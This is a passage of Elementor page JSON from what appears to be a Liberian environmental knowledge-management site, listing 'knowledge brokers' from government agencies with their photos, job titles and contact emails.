below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a 